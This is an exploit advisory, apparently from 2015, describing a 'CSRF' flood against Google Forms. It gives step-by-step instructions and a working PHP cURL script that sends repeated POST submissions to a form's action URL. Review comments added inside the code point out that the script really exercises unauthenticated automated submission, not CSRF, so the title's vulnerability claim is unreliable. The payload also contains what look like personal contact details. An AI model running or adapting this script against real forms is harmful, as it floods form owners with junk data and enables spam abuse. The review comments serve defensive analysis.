# Exploit Title: csrf google forms data flooding
# Date: 29-6-2015
# Exploit Author: alqnas eslam
# Vendor Homepage:fb.com/alqnas4
# Software Link: https://docs.google.com
# Tested on:windows or linux
========================================================
description:
Google does not set an anti-CSRF token in its forms,
so an attacker can flood a form with submitted data.
========================================================
Steps:
1- Open any form in Google Forms
2- Get the input names and the form action (you can use Burp Suite)
3- Edit the PHP code below: put in the input names, the action, and the number of submissions you want to send
4- Run the code on any server
==========================================================
poc:
<?php
// Submission counter; the while loop further down runs as long as it is <= 10.
$i =1;
// Send one HTTP POST carrying the given form fields to $url using cURL.
//
// $url  - target URL (the form's action).
// $data - array of field name => value pairs.
//
// Returns nothing: the response body produced by curl_exec() is discarded and
// the cURL handle is never closed explicitly.
//
// NOTE(review): the request is issued by this script itself, not by a
// victim's browser, so what the PoC exercises is unauthenticated automated
// submission. Controls that address that are rate limiting, CAPTCHA, or
// requiring signed-in respondents; a per-form token on its own is not a
// throttle.
function post_to_url($url, $data) {
    // Body is "name=value&" repeated. Names and values are concatenated
    // as-is (no URL-encoding) and the trailing '&' is left in place.
    $body = '';
    foreach ($data as $name => $val) {
        $body = $body . $name . '=' . $val . '&';
    }

    // Raise PHP's execution time limit for the remainder of the run.
    ini_set('max_execution_time', 50000);

    $ch = curl_init();
    // Have curl_exec() hand the response back instead of echoing it.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_URL, $url);
    // CURLOPT_POST is a boolean switch; the field count only acts as a truthy value.
    curl_setopt($ch, CURLOPT_POST, count($data));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    curl_exec($ch);
}
// Field set for one submission: the form's input names mapped to the values
// that are sent. The same set is reused for every request.
$payload = array(
    // input name => input value
    "entry.1749181457" => "test alqnas eslam",
    "entry.1360610555" => "01119032582",
    "entry.660237368" => "info test",
    "entry.319716724" => "alqnast@yahoo.com",
    "entry.1363501645" => "19",
    "draftResponse" => "",
    "pageHistory" => "0",
    "fbzx" => "-2167671423753092324"
);

// Number of submissions sent: 10 (counter starts at 1).
// NOTE(review): every request is identical and arrives back-to-back from one
// host, which is the pattern a per-source rate limit or duplicate-response
// check on the receiving side would catch.
while ($i <= 10) {
    // action of the form
    post_to_url("https://docs.google.com/forms/action", $payload);
    $i += 1;
}
?>
======================================================================
The result after running the code:
http://cdn.top4top.net/i_128f910c611.jpg
======================================================================
Video explaining the PoC on YouTube:
http://youtu.be/kHJi_8UNjxw
==============================================